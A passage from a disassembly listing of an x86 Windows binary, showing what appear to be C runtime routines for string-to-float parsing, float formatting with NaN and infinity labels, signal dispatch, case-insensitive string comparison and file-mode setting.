cmp cl, 20h
jz short loc_420CDE
cmp cl, 9
jz short loc_420CDE
cmp cl, 0Ah
jz short loc_420CDE
cmp cl, 0Dh
jnz short loc_420CE1
loc_420CDE: ; CODE XREF: sub_420C87+46�j
; sub_420C87+4B�j ...
inc edi
jmp short loc_420CC8
; ---------------------------------------------------------------------------
loc_420CE1: ; CODE XREF: sub_420C87+55�j
; sub_420C87+B5�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_420F60 ; default
; jumptable 00420CED case 10
jmp off_421091[eax*4] ; switch jump
loc_420CF4: ; DATA XREF: .text:off_421091�o
cmp bl, 31h ; jumptable 00420CED case 0
jl short loc_420D05
cmp bl, 39h
jg short loc_420D05
loc_420CFE: ; CODE XREF: sub_420C87+CE�j
; sub_420C87+129�j
push 3
jmp loc_420F1F
; ---------------------------------------------------------------------------
loc_420D05: ; CODE XREF: sub_420C87+70�j
; sub_420C87+75�j
cmp bl, byte_432C98
jnz short loc_420D14
loc_420D0D: ; CODE XREF: sub_420C87+135�j
push 5
jmp loc_420F56
; ---------------------------------------------------------------------------
loc_420D14: ; CODE XREF: sub_420C87+84�j
movsx eax, bl
sub eax, 2Bh
jz short loc_420D3E
dec eax
dec eax
jz short loc_420D32
sub eax, 3
jz loc_420DCB
mov [ebp+var_8], esi
dec edi
jmp loc_420EDD
; ---------------------------------------------------------------------------
loc_420D32: ; CODE XREF: sub_420C87+97�j
push 2
pop eax
mov [ebp+var_2C], 8000h
jmp short loc_420CE1
; ---------------------------------------------------------------------------
loc_420D3E: ; CODE XREF: sub_420C87+93�j
and [ebp+var_2C], 0
push 2
pop eax
jmp short loc_420CE1
; ---------------------------------------------------------------------------
loc_420D47: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
xor eax, eax ; jumptable 00420CED case 1
inc eax
cmp bl, 31h
mov [ebp+var_14], eax
jl short loc_420D57
cmp bl, 39h
jle short loc_420CFE
loc_420D57: ; CODE XREF: sub_420C87+C9�j
cmp bl, byte_432C98
jnz short loc_420D66
loc_420D5F: ; CODE XREF: sub_420C87+182�j
push 4
jmp loc_420F56
; ---------------------------------------------------------------------------
loc_420D66: ; CODE XREF: sub_420C87+D6�j
cmp bl, 2Bh
jz short loc_420DA0
cmp bl, 2Dh
jz short loc_420DA0
cmp bl, 30h
jz loc_420CE1
loc_420D79: ; CODE XREF: sub_420C87+1DA�j
cmp bl, 43h
jle loc_420ED9
cmp bl, 45h
jle short loc_420D99
cmp bl, 63h
jle loc_420ED9
cmp bl, 65h
jg loc_420ED9
loc_420D99: ; CODE XREF: sub_420C87+FE�j
push 6
jmp loc_420F56
; ---------------------------------------------------------------------------
loc_420DA0: ; CODE XREF: sub_420C87+E2�j
; sub_420C87+E7�j ...
dec edi
push 0Bh
jmp loc_420F56
; ---------------------------------------------------------------------------
loc_420DA8: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
cmp bl, 31h ; jumptable 00420CED case 2
jl short loc_420DB6
cmp bl, 39h
jle loc_420CFE
loc_420DB6: ; CODE XREF: sub_420C87+124�j
cmp bl, byte_432C98
jz loc_420D0D
cmp bl, 30h
jnz loc_420F2B
loc_420DCB: ; CODE XREF: sub_420C87+9C�j
xor eax, eax
inc eax
jmp loc_420CE1
; ---------------------------------------------------------------------------
loc_420DD3: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
mov [ebp+var_14], 1 ; jumptable 00420CED case 3
jmp short loc_420DF3
; ---------------------------------------------------------------------------
loc_420DDC: ; CODE XREF: sub_420C87+178�j
cmp [ebp+var_C], 19h
jnb short loc_420DED
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
jmp short loc_420DF0
; ---------------------------------------------------------------------------
loc_420DED: ; CODE XREF: sub_420C87+159�j
inc [ebp+var_10]
loc_420DF0: ; CODE XREF: sub_420C87+164�j
mov bl, [edi]
inc edi
loc_420DF3: ; CODE XREF: sub_420C87+153�j
movzx eax, bl
push eax
call sub_41E669
test eax, eax
pop ecx
jnz short loc_420DDC
cmp bl, byte_432C98
jnz short loc_420E4F
jmp loc_420D5F
; ---------------------------------------------------------------------------
loc_420E0E: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
xor eax, eax ; jumptable 00420CED case 4
inc eax
cmp [ebp+var_C], 0
mov [ebp+var_14], eax
mov [ebp+var_28], eax
jnz short loc_420E41
jmp short loc_420E25
; ---------------------------------------------------------------------------
loc_420E1F: ; CODE XREF: sub_420C87+1A1�j
dec [ebp+var_10]
mov bl, [edi]
inc edi
loc_420E25: ; CODE XREF: sub_420C87+196�j
cmp bl, 30h
jz short loc_420E1F
jmp short loc_420E41
; ---------------------------------------------------------------------------
loc_420E2C: ; CODE XREF: sub_420C87+1C6�j
cmp [ebp+var_C], 19h
jnb short loc_420E3E
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
dec [ebp+var_10]
loc_420E3E: ; CODE XREF: sub_420C87+1A9�j
mov bl, [edi]
inc edi
loc_420E41: ; CODE XREF: sub_420C87+194�j
; sub_420C87+1A3�j
movzx eax, bl
push eax
call sub_41E669
test eax, eax
pop ecx
jnz short loc_420E2C
loc_420E4F: ; CODE XREF: sub_420C87+180�j
cmp bl, 2Bh
jz loc_420DA0
cmp bl, 2Dh
jz loc_420DA0
jmp loc_420D79
; ---------------------------------------------------------------------------
loc_420E66: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
movzx eax, bl ; jumptable 00420CED case 5
push eax
mov [ebp+var_28], 1
call sub_41E669
test eax, eax
pop ecx
jz loc_420F2B
push 4
jmp loc_420F1F
; ---------------------------------------------------------------------------
loc_420E86: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
cmp bl, 31h ; jumptable 00420CED case 6
lea ecx, [edi-2]
mov [ebp+arg_8], ecx
jl short loc_420E9A
cmp bl, 39h
jle loc_420F1D
loc_420E9A: ; CODE XREF: sub_420C87+208�j
movsx eax, bl
sub eax, 2Bh
jz loc_420F54
dec eax
dec eax
jz loc_420F48
sub eax, 3
jnz loc_420F6E
loc_420EB7: ; CODE XREF: sub_420C87+2A2�j
push 8
jmp loc_420F56
; ---------------------------------------------------------------------------
loc_420EBE: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
mov [ebp+var_24], 1 ; jumptable 00420CED case 8
jmp short loc_420ECA
; ---------------------------------------------------------------------------
loc_420EC7: ; CODE XREF: sub_420C87+246�j
mov bl, [edi]
inc edi
loc_420ECA: ; CODE XREF: sub_420C87+23E�j
cmp bl, 30h
jz short loc_420EC7
cmp bl, 31h
jl short loc_420ED9
cmp bl, 39h
jle short loc_420F1D
loc_420ED9: ; CODE XREF: sub_420C87+F5�j
; sub_420C87+103�j ...
dec edi
loc_420EDA: ; CODE XREF: sub_420C87+2A7�j
; sub_420C87+2E2�j
mov [ebp+var_8], esi
loc_420EDD: ; CODE XREF: sub_420C87+A6�j
; sub_420C87+2EC�j ...
cmp [ebp+var_14], 0
mov eax, [ebp+arg_4]
mov [eax], edi
jz loc_42103C
push 18h
pop eax
cmp [ebp+var_C], eax
jbe short loc_420F04
cmp [ebp+var_41], 5
jl short loc_420EFD
inc [ebp+var_41]
loc_420EFD: ; CODE XREF: sub_420C87+271�j
dec esi
inc [ebp+var_10]
mov [ebp+var_C], eax
loc_420F04: ; CODE XREF: sub_420C87+26B�j
cmp [ebp+var_C], 0
jbe loc_421063
jmp loc_420FD8
; ---------------------------------------------------------------------------
loc_420F13: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
cmp bl, 31h ; jumptable 00420CED case 7
jl short loc_420F26
cmp bl, 39h
jg short loc_420F26
loc_420F1D: ; CODE XREF: sub_420C87+20D�j
; sub_420C87+250�j
push 9
loc_420F1F: ; CODE XREF: sub_420C87+79�j
; sub_420C87+1FA�j
pop eax
dec edi
jmp loc_420CE1
; ---------------------------------------------------------------------------
loc_420F26: ; CODE XREF: sub_420C87+28F�j
; sub_420C87+294�j
cmp bl, 30h
jz short loc_420EB7
loc_420F2B: ; CODE XREF: sub_420C87+13E�j
; sub_420C87+1F2�j
mov edi, [ebp+arg_8]
jmp short loc_420EDA
; ---------------------------------------------------------------------------
loc_420F30: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
cmp [ebp+arg_18], 0 ; jumptable 00420CED case 11
jz short loc_420F5C
movsx eax, bl
sub eax, 2Bh
lea ecx, [edi-1]
mov [ebp+arg_8], ecx
jz short loc_420F54
dec eax
dec eax
jnz short loc_420F6E
loc_420F48: ; CODE XREF: sub_420C87+221�j
or [ebp+var_1C], 0FFFFFFFFh
push 7
pop eax
jmp loc_420CE1
; ---------------------------------------------------------------------------
loc_420F54: ; CODE XREF: sub_420C87+219�j
; sub_420C87+2BB�j
push 7
loc_420F56: ; CODE XREF: sub_420C87+88�j
; sub_420C87+DA�j ...
pop eax
jmp loc_420CE1
; ---------------------------------------------------------------------------
loc_420F5C: ; CODE XREF: sub_420C87+2AD�j
push 0Ah
pop eax
dec edi
loc_420F60: ; CODE XREF: sub_420C87+60�j
; sub_420C87+66�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00420CED case 10
jnz loc_420CE1
jmp loc_420EDA
; ---------------------------------------------------------------------------
loc_420F6E: ; CODE XREF: sub_420C87+22A�j
; sub_420C87+2BF�j
mov [ebp+var_8], esi
mov edi, ecx
jmp loc_420EDD
; ---------------------------------------------------------------------------
loc_420F78: ; CODE XREF: sub_420C87+66�j
; DATA XREF: .text:off_421091�o
mov [ebp+var_8], esi ; jumptable 00420CED case 9
mov [ebp+var_24], 1
xor esi, esi
jmp short loc_420F9B
; ---------------------------------------------------------------------------
loc_420F86: ; CODE XREF: sub_420C87+320�j
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_420FAB
mov bl, [edi]
inc edi
loc_420F9B: ; CODE XREF: sub_420C87+2FD�j
movzx eax, bl
push eax
call sub_41E669
test eax, eax
pop ecx
jnz short loc_420F86
jmp short loc_420FB0
; ---------------------------------------------------------------------------
loc_420FAB: ; CODE XREF: sub_420C87+30F�j
mov esi, 1451h
loc_420FB0: ; CODE XREF: sub_420C87+322�j
mov [ebp+var_20], esi
movzx eax, bl
jmp short loc_420FBE
; ---------------------------------------------------------------------------
loc_420FB8: ; CODE XREF: sub_420C87+340�j
mov al, [edi]
inc edi
movzx eax, al
loc_420FBE: ; CODE XREF: sub_420C87+32F�j
push eax
call sub_41E669
test eax, eax
pop ecx
jnz short loc_420FB8
mov esi, [ebp+var_8]
dec edi
jmp loc_420EDD
; ---------------------------------------------------------------------------
loc_420FD2: ; CODE XREF: sub_420C87+355�j
dec [ebp+var_C]
inc [ebp+var_10]
loc_420FD8: ; CODE XREF: sub_420C87+287�j
dec esi
cmp byte ptr [esi], 0
jz short loc_420FD2
lea eax, [ebp+var_3C]
push eax
push [ebp+var_C]
lea eax, [ebp+var_58]
push eax
call sub_420BA3
mov eax, [ebp+var_20]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_1C], ecx
jge short loc_420FFD
neg eax
loc_420FFD: ; CODE XREF: sub_420C87+372�j
add eax, [ebp+var_10]
cmp [ebp+var_24], ecx
jnz short loc_421008
add eax, [ebp+arg_10]
loc_421008: ; CODE XREF: sub_420C87+37C�j
cmp [ebp+var_28], ecx
jnz short loc_421010
sub eax, [ebp+arg_14]
loc_421010: ; CODE XREF: sub_420C87+384�j
cmp eax, 1450h
jg short loc_421045
cmp eax, 0FFFFEBB0h
jl short loc_42105C
push [ebp+arg_C]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_4217FB
mov edx, [ebp+var_3C]
mov ebx, [ebp+var_3C+2]
mov esi, [ebp+var_36]
mov eax, [ebp+var_32]
add esp, 0Ch
jmp short loc_42106B
; ---------------------------------------------------------------------------
loc_42103C: ; CODE XREF: sub_420C87+25F�j
mov [ebp+var_18], 4
jmp short loc_421063
; ---------------------------------------------------------------------------
loc_421045: ; CODE XREF: sub_420C87+38E�j
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_18], 2
jmp short loc_42106B
; ---------------------------------------------------------------------------
loc_42105C: ; CODE XREF: sub_420C87+395�j
mov [ebp+var_18], 1
loc_421063: ; CODE XREF: sub_420C87+281�j
; sub_420C87+3BC�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
loc_42106B: ; CODE XREF: sub_420C87+3B3�j
; sub_420C87+3D3�j
mov ecx, [ebp+arg_0]
or eax, [ebp+var_2C]
mov [ecx+2], ebx
mov [ecx+6], esi
mov [ecx+0Ah], ax
mov eax, [ebp+var_18]
mov [ecx], dx
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41C526
leave
retn
sub_420C87 endp
; ---------------------------------------------------------------------------
off_421091 dd offset loc_420CF4 ; DATA XREF: sub_420C87+66�r
dd offset loc_420D47 ; jump table for switch statement
dd offset loc_420DA8
dd offset loc_420DD3
dd offset loc_420E0E
dd offset loc_420E66
dd offset loc_420E86
dd offset loc_420F13
dd offset loc_420EBE
dd offset loc_420F78
dd offset loc_420F60
dd offset loc_420F30
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4210C1 proc near ; CODE XREF: sub_42009C+36�p
var_30 = byte ptr -30h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_14]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_24], 0CCh
mov [ebp+var_23], 0CCh
mov [ebp+var_22], 0CCh
mov [ebp+var_21], 0CCh
mov [ebp+var_20], 0CCh
mov [ebp+var_1F], 0CCh
mov [ebp+var_1E], 0CCh
mov [ebp+var_1D], 0CCh
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0FBh
mov [ebp+var_19], 3Fh
mov [ebp+var_8], 1
mov edx, eax
jz short loc_42112E
mov byte ptr [ebx+2], 2Dh
jmp short loc_421132
; ---------------------------------------------------------------------------
loc_42112E: ; CODE XREF: sub_4210C1+65�j
mov byte ptr [ebx+2], 20h
loc_421132: ; CODE XREF: sub_4210C1+6B�j
test dx, dx
mov edi, [ebp+arg_4]
jnz short loc_421147
test edi, edi
jnz short loc_421147
cmp [ebp+arg_0], edi
jz loc_42123A
loc_421147: ; CODE XREF: sub_4210C1+77�j
; sub_4210C1+7B�j
cmp dx, si
jnz short loc_4211C4
mov eax, 80000000h
cmp edi, eax
mov word ptr [ebx], 1
jnz short loc_421160
cmp [ebp+arg_0], 0
jz short loc_42116F
loc_421160: ; CODE XREF: sub_4210C1+97�j
test edi, 40000000h
jnz short loc_42116F
push offset a1Snan ; "1#SNAN"
jmp short loc_4211B5
; ---------------------------------------------------------------------------
loc_42116F: ; CODE XREF: sub_4210C1+9D�j
; sub_4210C1+A5�j
test cx, cx
jz short loc_421189
cmp edi, 0C0000000h
jnz short loc_421189
cmp [ebp+arg_0], 0
jnz short loc_4211B0
push offset a1Ind ; "1#IND"
jmp short loc_421198
; ---------------------------------------------------------------------------
loc_421189: ; CODE XREF: sub_4210C1+B1�j
; sub_4210C1+B9�j
cmp edi, eax
jnz short loc_4211B0
cmp [ebp+arg_0], 0
jnz short loc_4211B0
push offset a1Inf ; "1#INF"
loc_421198: ; CODE XREF: sub_4210C1+C6�j
lea eax, [ebx+4]
push eax
call sub_41BF70
mov byte ptr [ebx+3], 5
loc_4211A5: ; CODE XREF: sub_4210C1+101�j
and [ebp+var_8], 0
pop ecx
pop ecx
jmp loc_42131C
; ---------------------------------------------------------------------------
loc_4211B0: ; CODE XREF: sub_4210C1+BF�j
; sub_4210C1+CA�j ...
push offset a1Qnan ; "1#QNAN"
loc_4211B5: ; CODE XREF: sub_4210C1+AC�j
lea eax, [ebx+4]
push eax
call sub_41BF70
mov byte ptr [ebx+3], 6
jmp short loc_4211A5
; ---------------------------------------------------------------------------
loc_4211C4: ; CODE XREF: sub_4210C1+89�j
movzx eax, dx
mov esi, eax
imul eax, 4D10h
and [ebp+var_18], 0
mov ecx, edi
shr ecx, 18h
shr esi, 8
lea ecx, [esi+ecx*2]
imul ecx, 4Dh
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
mov [ebp+var_16], eax
sar esi, 10h
movsx eax, si
neg eax
push 1
push eax
lea eax, [ebp+var_18]
push eax
mov [ebp+var_E], dx
mov [ebp+var_12], edi
call sub_4217FB
add esp, 0Ch
cmp [ebp+var_E], 3FFFh
jb short loc_421225
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
inc esi
call sub_4215C3
pop ecx
pop ecx
loc_421225: ; CODE XREF: sub_4210C1+152�j
test [ebp+arg_10], 1
mov edi, [ebp+arg_C]
mov [ebx], si
jz short loc_421243
movsx eax, si
add edi, eax
test edi, edi
jg short loc_421243
loc_42123A: ; CODE XREF: sub_4210C1+80�j
mov byte ptr [ebx+4], 30h
jmp loc_421340
; ---------------------------------------------------------------------------
loc_421243: ; CODE XREF: sub_4210C1+16E�j
; sub_4210C1+177�j
cmp edi, 15h
jle short loc_42124B
push 15h
pop edi
loc_42124B: ; CODE XREF: sub_4210C1+185�j
movzx esi, [ebp+var_E]
sub esi, 3FFEh
and [ebp+var_E], 0
mov [ebp+arg_8], 8
loc_421261: ; CODE XREF: sub_4210C1+1AD�j
lea eax, [ebp+var_18]
push eax
call sub_420B48
dec [ebp+arg_8]
pop ecx
jnz short loc_421261
test esi, esi
jge short loc_42128B
neg esi
and esi, 0FFh
jle short loc_42128B
loc_42127E: ; CODE XREF: sub_4210C1+1C8�j
lea eax, [ebp+var_18]
push eax
call sub_420B76
dec esi
pop ecx
jnz short loc_42127E
loc_42128B: ; CODE XREF: sub_4210C1+1B1�j
; sub_4210C1+1BB�j
lea ecx, [edi+1]
test ecx, ecx
lea eax, [ebx+4]
mov [ebp+arg_8], eax
jle short loc_4212E8
mov [ebp+var_C], ecx
loc_42129B: ; CODE XREF: sub_4210C1+222�j
lea esi, [ebp+var_18]
lea edi, [ebp+var_30]
movsd
movsd
lea eax, [ebp+var_18]
push eax
movsd
call sub_420B48
lea eax, [ebp+var_18]
push eax
call sub_420B48
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_18]
push eax
call sub_420AEA
lea eax, [ebp+var_18]
push eax
call sub_420B48
mov al, byte ptr [ebp+var_E+1]
mov ecx, [ebp+arg_8]
and byte ptr [ebp+var_E+1], 0
add al, 30h
add esp, 14h
inc [ebp+arg_8]
dec [ebp+var_C]
mov [ecx], al
jnz short loc_42129B
mov eax, [ebp+arg_8]
loc_4212E8: ; CODE XREF: sub_4210C1+1D5�j
dec eax
mov cl, [eax]
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_421335
jmp short loc_4212FF
; ---------------------------------------------------------------------------
loc_4212F6: ; CODE XREF: sub_4210C1+240�j
cmp byte ptr [eax], 39h
jnz short loc_421303
mov byte ptr [eax], 30h
dec eax
loc_4212FF: ; CODE XREF: sub_4210C1+233�j
cmp eax, ecx
jnb short loc_4212F6
loc_421303: ; CODE XREF: sub_4210C1+238�j
cmp eax, ecx
jnb short loc_42130B
inc eax
inc word ptr [ebx]
loc_42130B: ; CODE XREF: sub_4210C1+244�j
inc byte ptr [eax]
loc_42130D: ; CODE XREF: sub_4210C1+27A�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_42131C: ; CODE XREF: sub_4210C1+EA�j
mov eax, [ebp+var_8]
loc_42131F: ; CODE XREF: sub_4210C1+292�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41C526
leave
retn
; ---------------------------------------------------------------------------
loc_42132F: ; CODE XREF: sub_4210C1+276�j
cmp byte ptr [eax], 30h
jnz short loc_421339
dec eax
loc_421335: ; CODE XREF: sub_4210C1+231�j
cmp eax, ecx
jnb short loc_42132F
loc_421339: ; CODE XREF: sub_4210C1+271�j
cmp eax, ecx
jnb short loc_42130D
mov byte ptr [ecx], 30h
loc_421340: ; CODE XREF: sub_4210C1+17D�j
and word ptr [ebx], 0
and byte ptr [ebx+5], 0
xor eax, eax
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
inc eax
jmp short loc_42131F
sub_4210C1 endp
; =============== S U B R O U T I N E =======================================
sub_421355 proc near ; CODE XREF: sub_421383+72�p
mov ecx, dword_432C6C
mov eax, edx
push edi
loc_42135E: ; CODE XREF: sub_421355+19�j
cmp [eax+4], esi
jz short loc_421370
lea edi, [ecx+ecx*2]
add eax, 0Ch
lea edi, [edx+edi*4]
cmp eax, edi
jb short loc_42135E
loc_421370: ; CODE XREF: sub_421355+C�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
pop edi
jnb short loc_421380
cmp [eax+4], esi
jz short locret_421382
loc_421380: ; CODE XREF: sub_421355+24�j
xor eax, eax
locret_421382: ; CODE XREF: sub_421355+29�j
retn
sub_421355 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421383 proc near ; CODE XREF: sub_41CE51+38A5�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004214CB SIZE 00000031 BYTES
push 20h
push offset stru_42CE10
call __SEH_prolog
xor ecx, ecx
mov [ebp+var_1C], ecx
mov eax, [ebp+arg_0]
dec eax
dec eax
jz short loc_421405
dec eax
dec eax
jz short loc_4213E5
sub eax, 4
jz short loc_4213E5
sub eax, 3
jz short loc_4213E5
sub eax, 4
jz short loc_4213D8
sub eax, 6
jz short loc_4213CB
dec eax
jz short loc_4213BE
or eax, 0FFFFFFFFh
jmp loc_4214F6
; ---------------------------------------------------------------------------
loc_4213BE: ; CODE XREF: sub_421383+31�j
mov esi, offset dword_4815A4
mov edi, dword_4815A4
jmp short loc_421410
; ---------------------------------------------------------------------------
loc_4213CB: ; CODE XREF: sub_421383+2E�j
mov esi, offset dword_4815A0
mov edi, dword_4815A0
jmp short loc_421410
; ---------------------------------------------------------------------------
loc_4213D8: ; CODE XREF: sub_421383+29�j
mov esi, offset dword_4815A8
mov edi, dword_4815A8
jmp short loc_421410
; ---------------------------------------------------------------------------
loc_4213E5: ; CODE XREF: sub_421383+1A�j
; sub_421383+1F�j ...
call sub_41915F
mov ebx, eax
mov [ebp+var_24], ebx
mov edx, [ebx+54h]
mov esi, [ebp+arg_0]
call sub_421355
mov esi, eax
add esi, 8
mov edi, [esi]
xor ecx, ecx
jmp short loc_42141A
; ---------------------------------------------------------------------------
loc_421405: ; CODE XREF: sub_421383+16�j
mov esi, offset dword_48159C
mov edi, dword_48159C
loc_421410: ; CODE XREF: sub_421383+46�j
; sub_421383+53�j ...
mov [ebp+var_1C], 1
mov ebx, [ebp+var_24]
loc_42141A: ; CODE XREF: sub_421383+80�j
mov [ebp+var_20], edi
cmp edi, 1
jz loc_4214F4
cmp edi, ecx
jnz short loc_421431
push 3
call sub_4183C4
loc_421431: ; CODE XREF: sub_421383+A5�j
cmp [ebp+var_1C], ecx
jz short loc_42143F
push ecx
call sub_41A166
pop ecx
xor ecx, ecx
loc_42143F: ; CODE XREF: sub_421383+B1�j
mov [ebp+ms_exc.disabled], ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_421454
cmp eax, 0Bh
jz short loc_421454
cmp eax, 4
jnz short loc_42146F
loc_421454: ; CODE XREF: sub_421383+C5�j
; sub_421383+CA�j
mov edx, [ebx+58h]
mov [ebp+var_28], edx
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_42149B
mov edx, [ebx+5Ch]
mov [ebp+var_2C], edx
mov dword ptr [ebx+5Ch], 8Ch
loc_42146F: ; CODE XREF: sub_421383+CF�j
cmp eax, 8
jnz short loc_42149B
mov eax, dword_432C60
loc_421479: ; CODE XREF: sub_421383+116�j
mov [ebp+var_30], eax
mov edx, dword_432C64
mov esi, dword_432C60
add edx, esi
cmp eax, edx
jge short loc_42149D
lea edx, [eax+eax*2]
mov esi, [ebx+54h]
mov [esi+edx*4+8], ecx
inc eax
jmp short loc_421479
; ---------------------------------------------------------------------------
loc_42149B: ; CODE XREF: sub_421383+DD�j
; sub_421383+EF�j
mov [esi], ecx
loc_42149D: ; CODE XREF: sub_421383+109�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4214BE
cmp [ebp+arg_0], 8
jnz short loc_4214CB
push dword ptr [ebx+5Ch]
push 8
call edi
pop ecx
jmp short loc_4214D0
sub_421383 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4214B6 proc near ; DATA XREF: .text:stru_42CE10�o
mov edi, [ebp-20h]
mov ebx, [ebp-24h]
xor ecx, ecx
sub_4214B6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4214BE proc near ; CODE XREF: sub_421383+11E�p
cmp [ebp-1Ch], ecx
jz short locret_4214CA
push ecx
call sub_41A0D2
pop ecx
locret_4214CA: ; CODE XREF: sub_4214BE+3�j
retn
sub_4214BE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421383
loc_4214CB: ; CODE XREF: sub_421383+127�j
push [ebp+arg_0]
call edi
loc_4214D0: ; CODE XREF: sub_421383+131�j
pop ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_4214E3
cmp eax, 0Bh
jz short loc_4214E3
cmp eax, 4
jnz short loc_4214F4
loc_4214E3: ; CODE XREF: sub_421383+154�j
; sub_421383+159�j
mov ecx, [ebp+var_28]
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_4214F4
mov eax, [ebp+var_2C]
mov [ebx+5Ch], eax
loc_4214F4: ; CODE XREF: sub_421383+9D�j
; sub_421383+15E�j ...
xor eax, eax
loc_4214F6: ; CODE XREF: sub_421383+36�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_421383
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz short loc_42155A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_42151C: ; CODE XREF: .text:00421549�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_42154B
or al, al
jz short loc_42154B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_421538
cmp ah, bl
ja short loc_421538
add ah, dh
loc_421538: ; CODE XREF: .text:00421530�j
; .text:00421534�j
cmp al, bh
jb short loc_421542
cmp al, bl
ja short loc_421542
add al, dh
loc_421542: ; CODE XREF: .text:0042153A�j
; .text:0042153E�j
cmp ah, al
jnz short loc_421551
sub ecx, 1
jnz short loc_42151C
loc_42154B: ; CODE XREF: .text:00421522�j
; .text:00421526�j
xor ecx, ecx
cmp ah, al
jz short loc_42155A
loc_421551: ; CODE XREF: .text:00421544�j
mov ecx, 0FFFFFFFFh
jb short loc_42155A
neg ecx
loc_42155A: ; CODE XREF: .text:0042150B�j
; .text:0042154F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_421561 proc near ; CODE XREF: sub_42098E+73�p
; sub_42098E+C4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_4815E0[ecx*4]
lea eax, [eax+eax*8]
lea edx, [ecx+eax*4+4]
mov cl, [edx]
xor eax, eax
mov al, cl
push esi
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_421597
and cl, 7Fh
jmp short loc_4215A4
; ---------------------------------------------------------------------------
loc_421597: ; CODE XREF: sub_421561+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_4215B3
or cl, 80h
loc_4215A4: ; CODE XREF: sub_421561+34�j
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, esi
mov [edx], cl
pop esi
retn
; ---------------------------------------------------------------------------
loc_4215B3: ; CODE XREF: sub_421561+3E�j
call sub_41B935
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_421561 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4215C3 proc near ; CODE XREF: sub_4210C1+15D�p
; sub_4217FB+6E�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
